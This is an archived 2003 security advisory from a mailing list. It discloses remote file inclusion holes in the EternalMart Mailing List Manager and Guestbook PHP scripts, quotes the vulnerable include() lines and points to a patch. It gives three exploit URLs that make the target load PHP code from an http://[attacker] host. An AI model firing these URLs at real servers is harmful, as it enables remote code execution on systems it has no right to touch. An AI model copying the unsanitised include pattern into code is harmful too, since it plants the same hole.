Vulnwatch mailing list archives
EMML, EMGB : Include() hole
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sat, 04 Oct 2003 16:39:27 +0200
Informations : °°°°°°°°°°°°° Language : PHP ------------------------------------------------- Produit : EMML (EternalMart Mailing List Manager) Version : 1.32 ------------------------------------------------- Produit : EMGB (EternalMart Guestbook) Version : 1.1 ------------------------------------------------- Website : http://www.eternalmart.com Problem : Include Files PHP Code/Location : °°°°°°°°°°°°°°°°°°° EMML : email_email_func.php : -------------------------------------------------- include("$emml_path/class.html.mime.mail.php"); -------------------------------------------------- /admin/auth.php : -------------------------------------------- include("$emml_admin_path/auth_func.php"); -------------------------------------------- EMGB : /admin/auth.php : -------------------------------------------- include("$emgb_admin_path/auth_func.php"); -------------------------------------------- Exploits : °°°°°°°° EMML :- http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will include the file :
http://[attacker]/auth_func.php- http://[target]/emml_email_func.php?emml_path=http://[attacker] will include the file :
http://[attacker]/class.html.mime.mail.php EMGB :- http://[target]/admin/auth.php?emgb_admin_path=http://[attacker] will include the file :
http://[attacker]/auth_func.php More Details/Solution : °°°°°°°°°°°°°°°°°°°°° A patch and more details can be found on http://www.phpsecure.info . frog-m@n _________________________________________________________________ Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail
Current thread:
- EMML, EMGB : Include() hole Frog Man (Oct 04)